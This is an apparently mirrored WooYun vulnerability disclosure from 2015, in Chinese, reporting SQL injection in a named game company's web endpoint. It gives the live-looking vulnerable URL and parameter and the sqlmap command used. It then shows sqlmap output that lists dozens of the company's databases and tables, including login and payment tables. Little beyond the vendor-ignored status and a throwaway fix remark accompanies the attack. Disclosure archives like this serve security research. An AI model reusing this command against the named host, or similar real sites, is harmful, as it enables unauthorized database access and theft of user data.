乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-09: 细节已通知厂商并且等待厂商处理中 2015-09-14: 厂商已经主动忽略漏洞,细节向公众公开
心若苍井空似水~~~~~~~~~~~~~
http://td.17m3.com//act/bug/ajax/ajaxprizelist.ashx?date=20140728 直接丢进sqlmap sqmap.py -u “http://td.17m3.com//act/bug/ajax/ajaxprizelist.ashx?date=20140728” --tables
[14:54:54] [INFO] fetching database names[14:54:54] [INFO] fetching number of databases[14:54:54] [INFO] resumed: 34[14:54:54] [INFO] resumed: 17m3[14:54:54] [INFO] resumed: 17m3TD[14:54:54] [INFO] resumed: 17m3TD_V2[14:54:54] [INFO] resumed: 229bs3[14:54:54] [INFO] resumed: bs3[14:54:54] [INFO] resumed: IMBAWeb[14:54:54] [INFO] resumed: KnowledgeLibrary[14:54:54] [INFO] resumed: master[14:54:54] [INFO] resumed: model[14:54:54] [INFO] resumed: MSanGuoAction[14:54:54] [INFO] resumed: MSanGuoCarnival[14:54:54] [INFO] resumed: MSanGuoEdm[14:54:54] [INFO] resumed: MSanGuoEdm2[14:54:54] [INFO] resumed: MSanGuoNewYear[14:54:54] [INFO] resumed: MSanGuoOldFriends[14:54:54] [INFO] resumed: MSanGuoOldFriends_20[14:54:54] [INFO] resumed: MSanGuoTermBegins[14:54:54] [INFO] resumed: MSanQsequence[14:54:54] [INFO] resumed: msdb[14:54:54] [INFO] resumed: MTFActCard[14:54:54] [INFO] resumed: MTFActCard_V2[14:54:54] [INFO] resumed: MTFAction[14:54:54] [INFO] resumed: MTFActivity[14:54:54] [INFO] resumed: MTFEvent[14:54:54] [INFO] resumed: MTFSignLottery[14:54:54] [INFO] resumed: ReportServer[14:54:54] [INFO] resumed: ReportServerTempDB[14:54:54] [INFO] resumed: smsmk[14:54:54] [INFO] resumed: TDPlatForm[14:54:54] [INFO] resumed: TDSurvey[14:54:54] [INFO] resumed: tempdb[14:54:54] [INFO] resumed: WebGame[14:54:54] [INFO] resumed: WGGongchengluedi[14:54:54] [INFO] resumed: WGJJSG
[14:55:06] [INFO] resumed: dbo.ActivatSequence[14:55:06] [INFO] resumed: dbo.ActivatSU[14:55:06] [INFO] resumed: dbo.PlayGame[14:55:06] [INFO] resumed: dbo.RandGame[14:55:06] [INFO] resumed: dbo.SendSequence[14:55:06] [INFO] resumed: dbo.SendTypeEnum[14:55:06] [INFO] resumed: dbo.SeniorUser[14:55:06] [INFO] resumed: dbo.SurveyUserCard[14:55:06] [INFO] resumed: dbo.Tab_ActSurveyAnswer[14:55:06] [INFO] resumed: dbo.Tab_PhoneCode[14:55:06] [INFO] fetching number of tables for database[14:55:06] [INFO] resumed: 23[14:55:06] [INFO] resumed: dbo.Area[14:55:06] [INFO] resumed: dbo.BS_BugInfo[14:55:06] [INFO] resumed: dbo.BS_BugType[14:55:06] [INFO] resumed: dbo.BS_PrizeDate[14:55:06] [INFO] resumed: dbo.BS_User_Login[14:55:06] [INFO] resumed: dbo.CheckIn_ActivityUser[14:55:06] [INFO] resumed: dbo.CheckIn_CheckData[14:55:06] [INFO] resumed: dbo.CheckIn_EntityPrize[14:55:06] [INFO] resumed: dbo.CheckIn_GiftBag[14:55:06] [INFO] retrieved: dbo.CheckIn_User_Login[14:55:33] [INFO] retrieved: dbo.CheckIn_WinningPrize[14:55:58] [INFO] retrieved: dbo.M_LevelRecord[14:56:29] [INFO] retrieved: dbo.M_LiveConfig[14:56:49] [INFO] retrieved: dbo.M_PayInfo
修复 你比我专业~~~~~
危害等级:无影响厂商忽略
忽略时间:2015-09-14 04:02
漏洞Rank:2 (WooYun评价)
暂无